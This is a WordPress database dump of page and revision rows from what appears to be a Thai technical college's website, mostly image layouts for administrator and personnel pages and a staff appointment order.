(1508, 3, '2018-03-06 14:27:31', '2018-03-06 07:27:31', '<span style=\"color: #ffffff;\">-----------------------------------------------------------------------------------------</span><img class=\"aligncenter wp-image-978 \" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55-274x300.jpg\" alt=\"\" width=\"192\" height=\"210\" />\r\n\r\n<span style=\"color: #ffffff;\">------------------------------------------------------------------------------------</span><img class=\"aligncenter wp-image-985 \" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51-1.jpg\" alt=\"\" width=\"284\" height=\"69\" />\r\n\r\n<img class=\"aligncenter wp-image-1507 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-14-26-44.jpg\" alt=\"\" width=\"792\" height=\"283\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-03-06 14:27:31', '2018-03-06 07:27:31', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(1509, 3, '2018-03-06 14:28:58', '2018-03-06 07:28:58', '', '6-3-2561 14-30-24', '', 'inherit', 'closed', 'closed', '', '6-3-2561-14-30-24', '', '', '2018-03-06 14:28:58', '2018-03-06 07:28:58', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/6-3-2561-14-30-24.jpg', 0, 'attachment', 'image/jpeg', 0),
(1510, 3, '2018-03-06 14:29:14', '2018-03-06 07:29:14', '<span style=\"color: #ffffff;\">-----------------------------------------------------------------------------------------</span><img class=\"aligncenter wp-image-978 \" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55-274x300.jpg\" alt=\"\" width=\"192\" height=\"210\" />\r\n\r\n<span style=\"color: #ffffff;\">------------------------------------------------------------------------------------</span><img class=\"aligncenter wp-image-985 \" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51-1.jpg\" alt=\"\" width=\"284\" height=\"69\" />\r\n\r\n<img class=\"aligncenter wp-image-1509 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-14-30-24.jpg\" alt=\"\" width=\"808\" height=\"276\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-03-06 14:29:14', '2018-03-06 07:29:14', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(1511, 3, '2018-03-06 14:30:14', '2018-03-06 07:30:14', '<span style=\"color: #ffffff;\">-----------------------------------------------------------------------------------------</span><img class=\"aligncenter wp-image-978 \" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55-274x300.jpg\" alt=\"\" width=\"192\" height=\"210\" />\r\n\r\n<span style=\"color: #ffffff;\">------------------------------------------------------------------------------------</span><img class=\"aligncenter wp-image-985 \" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51-1.jpg\" alt=\"\" width=\"284\" height=\"69\" />\r\n\r\n<img class=\"aligncenter wp-image-1509\" src=\"/wp-content/uploads/2018/03/6-3-2561-14-30-24.jpg\" alt=\"\" width=\"1000\" height=\"342\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-03-06 14:30:14', '2018-03-06 07:30:14', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(1512, 3, '2018-03-06 14:34:56', '2018-03-06 07:34:56', '<img class=\"alignnone size-full wp-image-10954\" src=\"/wp-content/uploads/2020/12/1.1.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />\r\n\r\n<img class=\"alignnone size-full wp-image-10955\" src=\"/wp-content/uploads/2020/12/1.2.jpg\" alt=\"\" width=\"3508\" height=\"2008\" />', 'งานบริหารงานทั่วไป', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%97%e0%b8%b1%e0%b9%88%e0%b8%a7%e0%b9%84%e0%b8%9b', '', '', '2020-12-08 12:25:49', '2020-12-08 05:25:49', '', 0, 'http://www.technicrayong.ac.th/?page_id=1512', 0, 'page', '', 0),
(1513, 3, '2018-03-06 14:34:56', '2018-03-06 07:34:56', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1456 \" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"369\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" />', 'งานบริหารงานทั่วไป', '', 'inherit', 'closed', 'closed', '', '1512-revision-v1', '', '', '2018-03-06 14:34:56', '2018-03-06 07:34:56', '', 1512, 'http://www.technicrayong.ac.th/1512-revision-v1/', 0, 'revision', '', 0),
(1515, 3, '2018-03-06 14:37:52', '2018-03-06 07:37:52', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1472\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-33-56.jpg\" alt=\"\" width=\"193\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1475 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"671\" height=\"319\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1477\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-51-11.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1478 \" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1480 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"461\" height=\"312\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1482\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-30-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1483 \" src=\"/wp-content/uploads/2018/03/5-3-2561-13-31-01.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1489 size-full\" src=\"/wp-content/uploads/2018/03/213114124.jpg\" alt=\"\" width=\"731\" height=\"640\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1492\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-22.jpg\" alt=\"\" width=\"191\" height=\"236\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1494 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-36-36.jpg\" alt=\"\" width=\"496\" height=\"330\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1495\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-41-43.jpg\" alt=\"\" width=\"191\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1499 size-full\" src=\"/wp-content/uploads/2018/03/6-3-2561-8-52-54.jpg\" alt=\"\" width=\"720\" height=\"633\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1502\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-33-55.jpg\" alt=\"\" width=\"189\" height=\"235\" />\r\n\r\n<img class=\"aligncenter wp-image-1503 \" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" />\r\n\r\n<img class=\"aligncenter wp-image-1504\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-38-38.jpg\" alt=\"\" width=\"290\" height=\"347\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-03-06 14:37:52', '2018-03-06 07:37:52', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(1516, 3, '2018-03-06 14:41:20', '2018-03-06 07:41:20', '<img class=\"aligncenter size-full wp-image-3452\" src=\"/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg\" alt=\"\" width=\"196\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4604\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\" alt=\"\" width=\"656\" height=\"339\" />\r\n<h3><span style=\"color: #0000ff;\">**</span><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560 <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #339966;\">**คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </span><span style=\"color: #339966;\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ <a href=\"/คำสั่งแต่งตั้ง-2468-2560\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></span></h3>\r\n<h3><span style=\"color: #800080;\"><strong>**หลักเกณฑ์และวิธีปฏิบัติในการจัดข้าราชการเข้าพักอาศัยในที่พักของทางราชการ </strong></span><span style=\"color: #339966;\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/แบบฟอร์ม-ขออนุญาตไปราชการวิทยาลัย.pdf\">**แบบฟอร์มขออนุญาตไปราชการวิทยาลัย</a></h3>\r\n<h3>**การประเมินตนเองและการจัดทำแผนพัฒนาตนเอง(ID PLAN) <a href=\"/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%95%E0%B8%99%E0%B9%80%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88/?preview_id=3020&preview_nonce=9d43a6f5df&_thumbnail_id=-1&preview=true\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานบุคลากร', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a3', '', '', '2018-11-16 14:26:15', '2018-11-16 07:26:15', '', 0, 'http://www.technicrayong.ac.th/?page_id=1516', 0, 'page', '', 0),
(1517, 3, '2018-03-06 14:41:20', '2018-03-06 07:41:20', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" />\r\n\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-03-06 14:41:20', '2018-03-06 07:41:20', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(1520, 3, '2018-03-06 14:56:26', '2018-03-06 07:56:26', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" /><span style=\"color: #0000ff;\"><img class=\" wp-image-1519 alignleft\" src=\"/wp-content/uploads/2018/03/hand-1464838_960_720-copy-300x300.png\" alt=\"\" width=\"42\" height=\"42\" /></span>\r\n<h3><a href=\"http://www.technicrayong.ac.th/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560</span></a></h3>\r\n<h3><span style=\"color: #008000;\"><span style=\"color: #0000ff;\"><img class=\" wp-image-1519 alignleft\" src=\"/wp-content/uploads/2018/03/hand-1464838_960_720-copy-300x300.png\" alt=\"\" width=\"42\" height=\"42\" /></span></span></h3>\r\n<h3><span style=\"color: #008000;\">คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ </span></h3>\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-03-06 14:56:26', '2018-03-06 07:56:26', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(1521, 3, '2018-03-06 14:57:43', '2018-03-06 07:57:43', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" /><span style=\"color: #0000ff;\"><img class=\" wp-image-1519 alignleft\" src=\"/wp-content/uploads/2018/03/hand-1464838_960_720-copy-300x300.png\" alt=\"\" width=\"42\" height=\"42\" /></span>\r\n<h3><a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560</span></a></h3>\r\n<h3><span style=\"color: #008000;\"><span style=\"color: #0000ff;\"><img class=\"wp-image-1519 alignleft\" src=\"/wp-content/uploads/2018/03/hand-1464838_960_720-copy-300x300.png\" alt=\"\" width=\"42\" height=\"42\" /></span></span></h3>\r\n<h3 style=\"text-align: left;\"><span style=\"color: #008000;\">คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ </span></h3>\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-03-06 14:57:43', '2018-03-06 07:57:43', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(1522, 3, '2018-03-06 15:05:48', '2018-03-06 08:05:48', '', 'คำสั่งแต่งตั้ง ที่ 2468 ปี 2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%84%e0%b8%b3%e0%b8%aa%e0%b8%b1%e0%b9%88%e0%b8%87%e0%b9%81%e0%b8%95%e0%b9%88%e0%b8%87%e0%b8%95%e0%b8%b1%e0%b9%89%e0%b8%87-%e0%b8%97%e0%b8%b5%e0%b9%88-2468-%e0%b8%9b%e0%b8%b5-2560', '', '', '2018-03-06 15:05:48', '2018-03-06 08:05:48', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/คำสั่งแต่งตั้ง-ที่-2468-ปี-2560.pdf', 0, 'attachment', 'application/pdf', 0),
(1523, 3, '2018-03-06 15:07:39', '2018-03-06 08:07:39', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2F%E0%B8%84%E0%B8%B3%E0%B8%AA%E0%B8%B1%E0%B9%88%E0%B8%87%E0%B9%81%E0%B8%95%E0%B9%88%E0%B8%87%E0%B8%95%E0%B8%B1%E0%B9%89%E0%B8%87-%E0%B8%97%E0%B8%B5%E0%B9%88-2468-%E0%B8%9B%E0%B8%B5-2560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ ', '', 'publish', 'closed', 'closed', '', '%e0%b8%84%e0%b8%b3%e0%b8%aa%e0%b8%b1%e0%b9%88%e0%b8%87%e0%b9%81%e0%b8%95%e0%b9%88%e0%b8%87%e0%b8%95%e0%b8%b1%e0%b9%89%e0%b8%87-2468-2560', '', '', '2018-03-06 15:10:38', '2018-03-06 08:10:38', '', 0, 'http://www.technicrayong.ac.th/?page_id=1523', 0, 'page', '', 0),
(1524, 3, '2018-03-06 15:07:39', '2018-03-06 08:07:39', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2F%E0%B8%84%E0%B8%B3%E0%B8%AA%E0%B8%B1%E0%B9%88%E0%B8%87%E0%B9%81%E0%B8%95%E0%B9%88%E0%B8%87%E0%B8%95%E0%B8%B1%E0%B9%89%E0%B8%87-%E0%B8%97%E0%B8%B5%E0%B9%88-2468-%E0%B8%9B%E0%B8%B5-2560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ ', '', 'inherit', 'closed', 'closed', '', '1523-revision-v1', '', '', '2018-03-06 15:07:39', '2018-03-06 08:07:39', '', 1523, 'http://www.technicrayong.ac.th/1523-revision-v1/', 0, 'revision', '', 0),
(1526, 3, '2018-03-06 15:10:46', '2018-03-06 08:10:46', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2F%E0%B8%84%E0%B8%B3%E0%B8%AA%E0%B8%B1%E0%B9%88%E0%B8%87%E0%B9%81%E0%B8%95%E0%B9%88%E0%B8%87%E0%B8%95%E0%B8%B1%E0%B9%89%E0%B8%87-%E0%B8%97%E0%B8%B5%E0%B9%88-2468-%E0%B8%9B%E0%B8%B5-2560.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ ', '', 'inherit', 'closed', 'closed', '', '1523-autosave-v1', '', '', '2018-03-06 15:10:46', '2018-03-06 08:10:46', '', 1523, 'http://www.technicrayong.ac.th/1523-autosave-v1/', 0, 'revision', '', 0),
(1527, 3, '2018-03-06 15:14:24', '2018-03-06 08:14:24', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" /><span style=\"color: #0000ff;\"><img class=\" wp-image-1519 alignleft\" src=\"/wp-content/uploads/2018/03/hand-1464838_960_720-copy-300x300.png\" alt=\"\" width=\"42\" height=\"42\" /></span>\r\n<h3><a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560</span></a></h3>\r\n<h3><span style=\"color: #008000;\"><span style=\"color: #0000ff;\"><img class=\"wp-image-1519 alignnone\" src=\"/wp-content/uploads/2018/03/hand-1464838_960_720-copy-300x300.png\" alt=\"\" width=\"42\" height=\"42\" /></span></span><span style=\"color: #339966;\"><a style=\"color: #339966;\" href=\"http://www.technicrayong.ac.th/คำสั่งแต่งตั้ง-2468-2560\">คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </a></span><span style=\"color: #339966;\"><a style=\"color: #339966;\" href=\"http://www.technicrayong.ac.th/คำสั่งแต่งตั้ง-2468-2560\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ</a> </span></h3>\r\n \r\n\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-03-06 15:14:24', '2018-03-06 08:14:24', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1528, 3, '2018-03-06 15:15:06', '2018-03-06 08:15:06', '<img class=\"aligncenter size-full wp-image-1469\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1467 \" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"365\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1468 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-22-07.jpg\" alt=\"\" width=\"717\" height=\"321\" /><span style=\"color: #0000ff;\"><img class=\" wp-image-1519 alignleft\" src=\"/wp-content/uploads/2018/03/hand-1464838_960_720-copy-300x300.png\" alt=\"\" width=\"42\" height=\"42\" /></span>\r\n<h3><a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A360/\"><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2560</span></a></h3>\r\n<h3><span style=\"color: #008000;\"><span style=\"color: #0000ff;\"><img class=\"wp-image-1519 alignnone\" src=\"/wp-content/uploads/2018/03/hand-1464838_960_720-copy-300x300.png\" alt=\"\" width=\"42\" height=\"42\" /></span></span><span style=\"color: #339966;\"><a style=\"color: #339966;\" href=\"/คำสั่งแต่งตั้ง-2468-2560\">คำสั่งวิทยาลัยเทคนิคระยอง ที่ ๒๔๖๘ / ๒๕๖๐ เรื่อง แต่งตั้งข้าราชการครู ลูกจ้างประจำ พนักงานราชการ </a></span><span style=\"color: #339966;\"><a style=\"color: #339966;\" href=\"/คำสั่งแต่งตั้ง-2468-2560\">และลูกจ้างชั่วคราว ให้ทำหน้าที่ และปฏิบัติหน้าที่รับผิดชอบ</a> </span></h3>\r\n \r\n\r\n ', 'งานบุคลากร', '', 'inherit', 'closed', 'closed', '', '1516-revision-v1', '', '', '2018-03-06 15:15:06', '2018-03-06 08:15:06', '', 1516, 'http://www.technicrayong.ac.th/1516-revision-v1/', 0, 'revision', '', 0),
(1529, 3, '2018-03-06 15:15:49', '2018-03-06 08:15:49', '<img class=\"aligncenter wp-image-1454 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-23-29.jpg\" alt=\"\" width=\"190\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1452 \" src=\"/wp-content/uploads/2018/03/นายกิตติพงค์-อุตตมะเวทิน.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1485 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><img class=\"aligncenter wp-image-1466 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-10-57-29.jpg\" alt=\"\" width=\"920\" height=\"314\" /><a href=\"http://www.technicrayong.ac.th/งานบุคลากร\"><img class=\"aligncenter wp-image-1469 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-25-12.jpg\" alt=\"\" width=\"195\" height=\"239\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/งานบุคลากร\"><img class=\"aligncenter wp-image-1467\" src=\"/wp-content/uploads/2018/03/5-3-2561-11-04-59.jpg\" alt=\"\" width=\"376\" height=\"104\" 